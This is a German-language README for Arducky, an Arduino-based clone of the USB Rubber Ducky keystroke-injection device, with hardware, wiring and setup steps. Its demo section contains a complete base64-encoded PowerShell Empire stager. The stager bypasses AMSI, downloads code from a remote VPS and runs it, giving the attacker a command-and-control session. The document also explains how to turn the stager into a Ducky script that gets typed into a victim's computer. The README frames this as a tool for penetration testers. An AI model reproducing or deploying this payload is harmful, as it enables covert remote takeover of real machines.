
Arducky - Arduino Ducky Skript Interpreter
Dieses Projekt zielt darauf ab, eine günstige (aber nicht weniger effiziente) Alternative zu Hak5's USB Rubber Ducky zu schaffen.
Der USB Rubber Ducky ist ein HID (Human Interface Device), das mit einer einfachen Skriptsprache programmiert werden kann, die es Pentestern ermöglicht, schnell und einfach Sicherheitsaudit-Payloads zu erstellen und einzusetzen, die menschliche Tastatureingaben imitieren.
Mit Arducky musst du dich nur mit Ducky Script befassen, das auf einer MicroSD-Karte gespeichert ist.
Nach der Einrichtung musst du deinen Arduino nicht mehr neu programmieren, um Skripte zu ändern.
| Menge | Artikel | Preis | Beschreibung |
|---|---|---|---|
| 1 | Arduino Pro Micro ATmega32U4 5V Board | $4.11 | Kompatibel mit USB-Protokoll, kann als HID-Maus oder -Tastatur verwendet werden |
| 1 | Micro SD Memory Shield | $0.78 | |
| 1 | Micro USB OTG Adapter | $0.99 | Optional. Kann verwendet werden, um das Micro-USB-Kabel zu ersetzen |
| 1 | DuPont Wires | $1.28 | |
| 1 | Micro SD Card | $18.00 | Dies ist ein Beispiel; ich bezweifle, dass du mehr als 1 GB benötigst |
Damit deine MicroSD-Karte mit Arducky verwendet werden kann, muss sie im FAT32-Dateisystem formatiert sein.
Ich empfehle dir dringend, deine SD-Karte (selbst wenn sie neu ist!) mit dem offiziellen SD Memory Card Formatter der SDA (SD Association) zu formatieren, anstatt die von deinem Betriebssystem bereitgestellten Formatierungswerkzeuge zu verwenden.
Nachdem du deine MicroSD-Karte formatiert hast, lass uns das MicroSD-Shield verdrahten!
Die MicroSD-Controller-Schnittstelle hat insgesamt sechs Pins (GND, VCC, MISO, MOSI, SCK, CS).
Basierend auf der Arduino SPI-Dokumentation muss die Steuerschnittstelle wie folgt verbunden werden (mit DuPont-Kabeln):

Hinweis: Wie im Abschnitt Hardwares erwähnt, ist das Modul für die Interaktion mit einem 5V-µC ausgelegt, daher benötigst du den 5V-Pin an deinem Arduino.


Klone das Projekt:
git clone https://gitlab.com/Creased/arducky
cd arducky/
Wenn du eine AZERTY-Tastatur verwendest, musst du auch deine Tastaturbibliothek (Keyboard.cpp und Keyboard.h) durch die enthaltene ersetzen.
Lade den Sketch arducky.ino mit der Arduino IDE auf dein Arduino-Board hoch.
Um die Datei arducky_femto.ino mit einem Ducky Script-Payload zu generieren, kannst du femto_generate_payload.py verwenden:
~# python3 femto_generate_payload.py -h
usage: femto_generate_payload.py [-h] [-i ino_file] [-o output_file]
payload_file
Generates payload in arducky_femto.ino from an input Rubber Ducky payload file
positional arguments:
payload_file input Rubber Ducky payload file
optional arguments:
-h, --help show this help message and exit
-i ino_file, --ino ino_file
input Arducky ino file
-o output_file, --out output_file
output Arducky ino file
Beispiel:
~# python3 femto_generate_payload.py -i arducky_femto.ino -o femto.ino demo/script.txt
Empire ist ein Post-Exploitation-Framework, das die Fähigkeit implementiert, PowerShell-Agenten ohne powershell.exe auszuführen, sowie schnell einsetzbare Post-Exploitation-Module, die von Keyloggern bis zu Mimikatz reichen.
In dieser Demo werden wir ein Empire auf einem entfernten Server (z. B. einer VPS) auf einem Docker-Knoten bereitstellen und Arducky verwenden, um darauf zuzugreifen.
Befolge bitte die in dieser Anleitung beschriebenen Schritte.
Wenn du ein neues Empire einrichtest, solltest du einen Payload wie den folgenden erhalten (siehe Ordner demo/):
powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQBzAFMARQBNAEIAbAB5AC4ARwBlAHQAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAVABGAEkAZQBsAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAFUAZQAoACQAbgBVAEwAbAAsACQAVAByAHUAZQApAH0AOwBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBTAEUAcgB2AGkAYwBlAFAATwBJAG4AdABNAGEAbgBBAGcARQBSAF0AOgA6AEUAWABwAEUAYwBUADEAMAAwAEMAbwBOAHQAaQBOAFUARQA9ADAAOwAkAHcAYwA9AE4ARQB3AC0ATwBCAEoAZQBDAFQAIABTAFkAUwB0AEUATQAuAE4ARQB0AC4AVwBFAEIAQwBsAGkAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABXAGMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAHIATwBYAFkAPQBbAFMAeQBTAHQARQBNAC4ATgBFAHQALgBXAGUAQgBSAGUAcQB1AEUAUwBUAF0AOgA6AEQAZQBGAEEAVQBMAHQAVwBlAEIAUABSAG8AWABZADsAJAB3AEMALgBQAHIAbwBYAHkALgBDAHIAZQBEAEUAbgBUAEkAYQBMAFMAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAE4ARQBUAC4AQwByAEUARABFAE4AVABJAEEAbABDAGEAYwBIAEUAXQA6ADoARABFAGYAYQBVAEwAVABOAEUAVAB3AG8AcgBLAEMAcgBlAGQARQBuAHQASQBBAGwAcwA7ACQASwA9AFsAUwBZAHMAdABlAE0ALgBUAEUAWABUAC4ARQBOAEMATwBEAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACcASwBBAE4AcwAjADgAJQBtAHAAWgBpAGQAUABTAEwAaABhAF0AZwBWAFsAWQAuAEcAPwBuAGsAfQBGAGMALwAzACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIARwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAHUATgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAVwBDAC4ASABFAGEARABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AMgBtADAARQB6AEsALwBlAEEATQBTAE4AbQAxAEIAaABlAEYAUwBEAGYAZAB3AE0AaQBxAFEAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvAHYAcABzADIALgBiAG0AbwBpAG4AZQAuAGYAcgA6ADgAMAA4ADAAJwA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkAGQAQQB0AGEAPQAkAFcAQwAuAEQATwBXAE4AbABvAEEAZABEAGEAdABhACgAJABzAGUAUgArACQAVAApADsAJABJAFYAPQAkAEQAYQB0AEEAWwAwAC4ALgAzAF0AOwAkAGQAYQBUAEEAPQAkAEQAQQB0AEEAWwA0AC4ALgAkAEQAQQB0AGEALgBMAEUATgBnAHQAaABdADsALQBKAG8ASQBOAFsAQwBIAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
Speichere es in einer Datei mit dem Namen stager.txt und führe das Skript create_script.sh aus, um das Ducky Script zu erstellen:
./create_script.sh
Kopiere das generierte script.txt in das Stammverzeichnis deiner MicroSD-Karte und schalte den Arducky ein.
Hier ist ein Video, das den Angriff demonstriert:
Voilà!
